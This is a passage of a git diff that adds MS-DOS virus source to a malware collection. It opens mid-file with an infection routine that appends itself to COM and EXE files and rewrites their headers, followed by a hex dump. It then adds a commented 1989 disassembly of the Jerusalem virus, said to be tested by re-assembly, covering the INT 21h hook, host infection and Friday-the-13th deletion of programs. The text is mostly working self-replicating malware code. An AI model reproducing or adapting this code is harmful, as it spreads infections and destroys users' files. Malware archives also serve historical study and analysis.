; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECTION PROCESS OCCURS HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 
+L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... 
+ INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE (OBVIOUSLY) + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE - YES + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP 
L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV 
CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. 
+;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. +;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... +;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C +;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8.. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jerusalm.asm b/MSDOS/Virus.MSDOS.Unknown.jerusalm.asm new file mode 100644 index 00000000..01e54400 --- /dev/null 
+++ b/MSDOS/Virus.MSDOS.Unknown.jerusalm.asm 
@@ -0,0 +1,797 @@
+ ; The 'Jerusalem' virus
+
+ ; Disassembled by Joe Hirst (Tel: 0273-26105) January 1989.
+
+ ; The disassembly has been tested by re-assembly using MASM 5.0
+
+RAM SEGMENT AT 0
+
+ ; System data
+
+ ORG 3FCH
+BW03FC DW ?
+BB03FE DB ?
+
+ ORG 2CH
+ENV_SG DW ? ; Segment address of environment
+
+RAM ENDS
+
+CODE SEGMENT BYTE PUBLIC 'CODE'
+ ASSUME CS:CODE,DS:NOTHING,ES:RAM
+
+START: JMP BP0010
+
+ DB 'sU'
+
+VR_SIG DB 'MsDos'
+
+VIR_RT EQU THIS DWORD
+V_RTOF DW 0100H
+V_RTSG DW 1C26H
+DEL_SW DB 0 ; Delete program switch
+BEGIN DW 0 ; Initial value for AX
+F_SIZE DW 2A74H ; Total file size
+
+INT_08 EQU THIS DWORD
+I08OFF DW 00ABH ; Int 8 offset
+I08SEG DW 17CDH ; Int 8 segment
+
+INT_21 EQU THIS DWORD
+I21OFF DW 1460H ; Int 21H offset
+I21SEG DW 029FH ; Int 21H segment
+
+INT_24 EQU THIS DWORD
+I24OFF DW 0556H ; Int 24H offset
+I24SEG DW 189BH ; Int 24H segment
+
+TCOUNT DW 3A53H ; Timer count
+
+ ; Fields passed by spare virus call
+
+SPAR01 DW 0 ; 00 Spare call field 1 - AX
+SP_RET EQU THIS DWORD
+SPAR02 DW 0 ; 02 Spare call field 2 - IP
+SPAR03 DW 0 ; 04 Spare call field 3 - CS
+SPAR04 DW 0 ; 06 Spare call field 4 - SP
+SPAR05 DW 0 ; 08 Spare call field 5 - SS
+SPAR06 DW 0 ; 0A Spare call field 6
+SPAR07 DW 0 ; 0C Spare call field 7
+SPAR08 DW 0 ; 0E Spare call field 8
+
+ST_ES1 DW 1BB5H ; Original ES
+SET_PA DW 0080H
+
+ ; Program parameter block
+
+PPB_01 DW 0 ; Environment address
+PPB_02 DW 0080H ; Command line offset
+PPB_03 DW 1BB5H ; Command line segment
+PPB_04 DW 005CH ; FCB1 offset
+PPB_05 DW 1BB5H ; FCB1 segment
+PPB_06 DW 006CH ; FCB2 offset
+PPB_07 DW 1BB5H ; FCB2 segment
+
+PRG_SP DW 0710H ; Initial stack pointer store
+PRG_SS DW 14EDH ; Initial stack segment store
+PROGRM EQU THIS DWORD
+PRGOFF DW 00C5H ; Initial code offset store
+PRGSEG DW 14EDH ; Initial code segment store
+SS_ST1 DW 0246H
+SS_ST2 DB 00A1H
+EXE_SW DB 0 ; EXE switch - 0 = .COM extension
+
+ ; .EXE header store
+
+EXEHED DB 4DH, 5AH ; 00 .EXE header ident
+EXHD01 DW 00F0H ; 02 Bytes in last page
+EXHD02 DW 00B2H ; 04 Size of file in pages
+EXHD03 DW 0138H ; 06 Number of relocation entries
+EXHD04 DW 0060H ; 08 Size of header in paragraphs
+EXHD05 DW 06D3H ; 0A Minimum extra storage required
+EXHD06 DW -1 ; 0C Maximum extra storage required
+EXHD07 DW 155EH ; 0E Initial stack segment
+EXHD08 DW 0710H ; 10 Initial stack pointer
+EXHD09 DW 1984H ; 12 Negative checksum
+EXHD10 DW 00C5H ; 14 Initial code offset
+EXHD11 DW 155EH ; 16 Initial code segment
+ DB 01EH, 000H, 000H, 000H
+
+SIGBUF DB 037H, 020H, 02AH, 02AH, 02AH
+F_HAND DW 5 ; File handle
+F_ATTS DW 0020H ; File attributes
+F_DATE DW 0F30H ; File date
+F_TIME DW 6000H ; File time
+BYTSEC DW 0200H ; Bytes per sector
+PARAGR DW 0010H ; Size of a paragraph
+F_SIZ1 DW 5BE0H ; Low-order file size
+F_SIZ2 DW 1 ; High-order file size
+F_PATH EQU THIS DWORD
+FPTHOF DW 41B9H ; Program pathname offset
+FPTHSG DW 9B2AH ; Program pathname segment
+COM_CM DB 'COMMAND.COM'
+MEM_SW DW 1 ; Memory allocated switch
+ DB 4 DUP (0)
+
+ ; This section seems to assume a COM origin of 100H
+
+BP0010:
+ CLD
+ MOV AH,0E0H ; Virus "are you there" call
+ INT 21H ; DOS service (Virus - 1)
+ CMP AH,0E0H ; Test for unchanged
+ JNB BP0020 ; Branch if invalid reply
+ CMP AH,3 ; Test for standard "yes"
+ JB BP0020 ; Branch if non-standard
+ MOV AH,0DDH ; Replace program
+ MOV DI,0100H ; Initial offset
+ MOV SI,OFFSET ENDADR ; Length of virus
+ ADD SI,DI ; Add initial offset
+ MOV CX,CS:F_SIZE[DI] ; Get total filesize
+ INT 21H ; DOS service (Virus - 2)
+BP0020:
+ MOV AX,CS ; Get current segment
+ ADD AX,10H ; Address past PSP
+ MOV SS,AX ; \ Set up stack
+ MOV SP,0700H ; /
+ PUSH AX ; Segment for return
+ MOV AX,OFFSET BP0030 ; \ Offset for return
+ PUSH AX ; /
+ RETF ; "Return" to next instruction
+
+ ; We now have an origin of zero
+
+BP0030:
+ CLD
+ PUSH ES
+ MOV ST_ES1,ES ; Save original ES
+ MOV PPB_03,ES ; \
+ MOV PPB_05,ES ; ) Segments in PPB
+ MOV PPB_07,ES ; /
+ MOV AX,ES ; \ Segment relocation factor
+ ADD AX,10H ; /
+ ADD PRGSEG,AX ; Initial code segment store
+ ADD PRG_SS,AX ; Initial stack segment store
+ MOV AH,0E0H ; Virus "are you there" call
+ INT 21H ; DOS service (Virus - 1)
+ CMP AH,0E0H ; Test for unchanged
+ JNB BP0040 ; Branch if not
+ CMP AH,3 ; Test for standard "yes"
+ POP ES
+ MOV SS,PRG_SS ; Initial stack segment store
+ MOV SP,PRG_SP ; Initial stack pointer store
+ JMP PROGRM ; Start of actual program
+
+ ; Virus is not already active
+
+BP0040:
+ XOR AX,AX ; \ Address page zero
+ MOV ES,AX ; /
+ MOV AX,BW03FC ; \ Save system area data (1)
+ MOV SS_ST1,AX ; /
+ MOV AL,BB03FE ; \ Save system area data (2)
+ MOV SS_ST2,AL ; /
+ MOV BW03FC,0A5F3H ; Store REPZ MOVSW
+ MOV BB03FE,0CBH ; Store RETF
+ POP AX ; \
+ ADD AX,10H ; ) Address past PSP
+ MOV ES,AX ; /
+ PUSH CS ; \ Set DS to CS
+ POP DS ; /
+ MOV CX,OFFSET ENDADR ; Length of virus
+ SHR CX,1 ; Divide by two (word parameter)
+ XOR SI,SI
+ MOV DI,SI
+ PUSH ES
+ MOV AX,OFFSET BP0050
+ PUSH AX
+ DB 0EAH ; \ Far jump to move instruction
+ DW BW03FC, 0 ; /
+
+BP0050:
+ MOV AX,CS
+ MOV SS,AX
+ MOV SP,0700H
+ XOR AX,AX ; \ Address page zero
+ MOV DS,AX ; /
+ ASSUME DS:RAM,ES:NOTHING
+ MOV AX,SS_ST1 ; \ Restore system area data (1)
+ MOV BW03FC,AX ; /
+ MOV AL,SS_ST2 ; \ Restore system area data (2)
+ MOV BB03FE,AL ; /
+ MOV BX,SP
+ MOV CL,4
+ SHR BX,CL
+ ADD BX,10H
+ MOV SET_PA,BX ; Save number of paragraphs
+ MOV AH,4AH ; Set block
+ MOV ES,ST_ES1 ; Get original ES
+ INT 21H ; DOS service (Set block)
+ MOV AX,3521H ; Get interrupt 21H
+ INT 21H ; DOS service (Get int)
+ MOV I21OFF,BX ; Save interrupt 21H offset
+ MOV I21SEG,ES ; Save interrupt 21H segment
+ PUSH CS ; \ Set DS to CS
+ POP DS ; /
+ ASSUME DS:CODE
+ MOV DX,OFFSET BP0130 ; Interrupt 21H routine
+ MOV AX,2521H ; Set interrupt 21H
+ INT 21H ; DOS service (Set int)
+ MOV ES,ST_ES1 ; Get original ES
+ ASSUME ES:RAM
+ MOV ES,ES:ENV_SG ; Get environment segment
+ XOR DI,DI ; Start of environment
+ MOV CX,7FFFH ; Allow for 32K environment
+ XOR AL,AL ; Search for zero
+BP0060:
+ REPNZ SCASB ; Find zero
+ CMP ES:[DI],AL ; Is following character zero
+ LOOPNZ BP0060 ; Search again if not
+ MOV DX,DI ; Save pointer
+ ADD DX,3 ; Address pathname
+ MOV AX,4B00H ; Load and execute program
+ PUSH ES ; \ Set DS to ES
+ POP DS ; /
+ PUSH CS ; \ Set ES to CS
+ POP ES ; /
+ ASSUME DS:RAM,ES:NOTHING
+ MOV BX,OFFSET PPB_01 ; PPB (for load and execute)
+ PUSH DS
+ PUSH ES
+ PUSH AX
+ PUSH BX
+ PUSH CX
+ PUSH DX
+ MOV AH,2AH ; Get date
+ INT 21H ; DOS service (Get date)
+ MOV DEL_SW,0 ; Set delete program switch off
+ CMP CX,07C3H ; Year = 1987
+ JZ BP0080 ; Branch if yes
+ CMP AL,5 ; Day of week = Friday
+ JNZ BP0070 ; Branch if not
+ CMP DL,0DH ; Day of month = 13
+ JNZ BP0070 ; Branch if not
+ INC DEL_SW ; Set delete program switch on
+ JMP BP0080
+
+BP0070:
+ MOV AX,3508H ; Get interrupt 8
+ INT 21H ; DOS service (Get int)
+ MOV I08OFF,BX ; Save interrupt 8 offset
+ MOV I08SEG,ES ; Save interrupt 8 segment
+ PUSH CS ; \ Set DS to CS
+ POP DS ; /
+ ASSUME DS:CODE
+ MOV TCOUNT,7E90H ; Start clock count (30 mins)
+ MOV AX,2508H ; Set interrupt 8
+ MOV DX,OFFSET BP0100 ; Interrupt 8 routine
+ INT 21H ; DOS service (Set int)
+BP0080:
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ POP ES
+ POP DS
+ ASSUME DS:NOTHING
+ PUSHF ; Fake an interrupt
+ CALL INT_21 ; Interrupt 21H (Load and execute)
+ PUSH DS ; \ Set ES to DS
+ POP ES ; /
+ MOV AH,49H ; Free allocated memory
+ INT 21H ; DOS service (Free memory)
+ MOV AH,4DH ; Get return code of child process
+ INT 21H ; DOS service (Get return code)
+ MOV AH,31H ; Keep process
+ MOV DX,OFFSET ENDKEEP ; Length of program
+ MOV CL,4 ; \ Convert to paragraphs
+ SHR DX,CL ; /
+ ADD DX,10H ; And another 256 bytes
+ INT 21H ; DOS service (Keep process)
+
+ ; Interrupt 24H
+
+BP0090:
+ XOR AL,AL ; Ignore the error
+ IRET
+
+ ; Interrupt 8
+
+BP0100:
+ CMP TCOUNT,2 ; Is timer ready
+ JNZ BP0110 ; Branch if not
+ PUSH AX
+ PUSH BX
+ PUSH CX
+ PUSH DX
+ PUSH BP
+ MOV AX,0602H ; Scroll up two lines
+ MOV BH,87H ; Blinking white on black
+ MOV CX,0505H ; Start row 5 column 5
+ MOV DX,1010H ; End row 16 column 16
+ INT 10H ; VDU I/O
+ POP BP
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+BP0110:
+ DEC TCOUNT ; Subtract from timer count
+ JNZ BP0120 ; Branch if not zero
+ MOV TCOUNT,1 ; Set back to one
+ PUSH AX
+ PUSH CX
+ PUSH SI
+ MOV CX,4001H ; \ Waste some time
+ REPZ LODSB ; /
+ POP SI
+ POP CX
+ POP AX
+BP0120:
+ JMP INT_08 ; Interrupt 8
+
+ ; Interrupt 21H
+
+BP0130:
+ PUSHF
+ CMP AH,0E0H ; Virus "are you there" call
+ JNZ BP0140 ; Branch if other call
+ MOV AX,0300H ; Standard "yes"
+ POPF
+ IRET
+
+BP0140:
+ CMP AH,0DDH ; Virus replace program call
+ JZ BP0160 ; Branch if yes
+ CMP AH,0DEH ; Virus spare call
+ JZ BP0170 ; Branch if yes
+ CMP AX,4B00H ; Is it load and execute
+ JNZ BP0150 ; Branch if not
+ JMP BP0210 ; Process load and execute
+
+BP0150:
+ POPF
+ JMP CS:INT_21 ; Interrupt 21H
+
+ ; Replace program call
+
+BP0160:
+ POP AX
+ POP AX ; Retrieve return offset
+ MOV AX,100H ; Replace with start address
+ MOV V_RTOF,AX ; Store in return jump
+ POP AX ; Retrieve return segment
+ MOV V_RTSG,AX ; Store in return jump
+ REPZ MOVSB ; Restore program to beginning
+ POPF
+ MOV AX,BEGIN ; Start with zero register
+ JMP VIR_RT ; Start actual program
+
+ ; Spare virus call
+
+BP0170:
+ ADD SP,6 ; Remove three words from stack
+ POPF
+ MOV AX,CS ; \
+ MOV SS,AX ; ) Set up internal stack
+ MOV SP,OFFSET ENDADR ; /
+ PUSH ES
+ PUSH ES
+ XOR DI,DI
+ PUSH CS ; \ Set ES to CS
+ POP ES ; /
+ MOV CX,10H ; Length to move
+ MOV SI,BX
+ MOV DI,OFFSET SPAR01
+ REPZ MOVSB ; Copy to SPAR01-SPAR08 inclusive
+ MOV AX,DS ; \ Set ES to DS
+ MOV ES,AX ; /
+ MUL PARAGR ; Size of a paragraph
+ ADD AX,SPAR06 ; \ Add
+ ADC DX,0 ; /
+ DIV PARAGR ; Size of a paragraph
+ MOV DS,AX
+ MOV SI,DX
+ MOV DI,DX
+ MOV BP,ES ; Save ES
+ MOV BX,SPAR08
+ OR BX,BX
+ JZ BP0190
+BP0180:
+ MOV CX,8000H
+ REPZ MOVSW
+ ADD AX,1000H
+ ADD BP,1000H
+ MOV DS,AX
+ MOV ES,BP ; Restore ES
+ DEC BX
+ JNZ BP0180
+BP0190:
+ MOV CX,SPAR07
+ REPZ MOVSB
+ POP AX ; Recover ES
+ PUSH AX ; Put it back again
+ ADD AX,10H ; Address past PSP
+ ADD SPAR05,AX ; Relocate SS
+ ADD SPAR03,AX ; Relocate ?
+ MOV AX,SPAR01
+ POP DS
+ POP ES
+ MOV SS,SPAR05
+ MOV SP,SPAR04
+ JMP SP_RET
+
+ ; Friday 13th - Delete program
+
+BP0200:
+ XOR CX,CX ; No attributes
+ MOV AX,4301H ; Set file attributes
+ INT 21H ; DOS service (Set attributes)
+ MOV AH,41H ; Delete directory entry
+ INT 21H ; DOS service (Delete entry)
+ MOV AX,4B00H ; Load and execute program
+ POPF
+ JMP INT_21 ; Interrupt 21H
+
+ ; Process load and execute program
+
+BP0210:
+ CMP DEL_SW,1 ; Test delete program switch
+ JZ BP0200 ; Branch to delete if on
+ MOV F_HAND,-1 ; No file handle
+ MOV MEM_SW,0 ; Set off memory allocated switch
+ MOV FPTHOF,DX ; Save pathname offset
+ MOV FPTHSG,DS ; Save pathname segment
+ PUSH AX
+ PUSH BX
+ PUSH CX
+ PUSH DX
+ PUSH SI
+ PUSH DI
+ PUSH DS
+ PUSH ES
+ CLD
+ MOV DI,DX ; Point to file pathname
+ XOR DL,DL ; Default drive
+ CMP BYTE PTR [DI+1],3AH ; Test second character for ':'
+ JNZ BP0220 ; Branch if not
+ MOV DL,[DI] ; Get drive letter
+ AND DL,1FH ; Convert to number
+BP0220:
+ MOV AH,36H ; Get disk free space
+ INT 21H ; DOS service (Get disk free)
+ CMP AX,-1 ; Test for invalid drive
+ JNZ BP0240 ; Branch if not
+BP0230:
+ JMP BP0500 ; Terminate
+
+BP0240:
+ MUL BX ; Calc number of free sectors
+ MUL CX ; Calc number of free bytes
+ OR DX,DX ; Test high word of result
+ JNZ BP0250 ; Branch if not zero
+ CMP AX,OFFSET ENDADR ; Length of virus
+ JB BP0230 ; Terminate if less
+BP0250:
